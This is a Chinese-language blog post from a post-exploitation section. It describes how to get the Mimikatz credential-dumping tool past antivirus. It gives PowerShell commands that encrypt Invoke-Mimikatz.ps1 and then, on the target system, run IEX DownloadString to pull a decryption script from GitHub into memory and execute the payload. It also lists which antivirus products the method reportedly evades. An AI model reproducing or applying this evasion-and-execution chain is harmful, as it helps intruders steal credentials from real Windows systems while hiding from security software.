PythonPig's Blog 移动通信 TCP/IP Hacker 后渗透 伪码农

绕过杀软执行Mimikatz

2020-11-03
PythonPig

各路大神绕过杀软执行Mimikatz的方法有很多,在这里记录平时用到的方法,以下方法均来自网络,感谢各位大神。

Mimikatz

图片来源于 https://www.izoologic.com/2019/07/31/mimikatz-ransomware-specially-designed-for-hacking/

#0x00 使⽤Out-EncryptedScript加密绕过查杀

通过加密脚本将Invoke-Mimikatz.ps1加密,加密后的文件可以绕过杀软的静态查杀,这里使用Powersploit提供的加解密脚本Out-EncryptedScript(Powersploit中还有其他加解密脚本)。
具体方法如下:
首先将Invoke-Mimikatz.ps1在本地加密。

Import-Module .\Out-EncryptedScript.ps1
Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password RdGIA*@$ -Salt 7DX8oqHM

执行上述命令后将在本目录下生成加密后的文件evil.ps1。
将evil.ps1上传至目标系统,通过powershell将解密脚本下载并加载至内存解密evil.ps1执行,执行如下命令可绕过部分杀软执行Mimikatz。
已测试绕过的杀软包括360和McAfee,avast的web shield会阻止下载Out-EncryptedScript.ps1文件,无法绕过windows defender的RealTime Protection。

IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Out-EncryptedScript.ps1")
[String] $cmd = Get-Content .\evil.ps1 
Invoke-Expression $cmd 
$decrypted = de RdGIA*@$ 7DX8oqHM
Invoke-Expression $decrypted 
Invoke-Mimikatz

参考


Similar Posts

Comments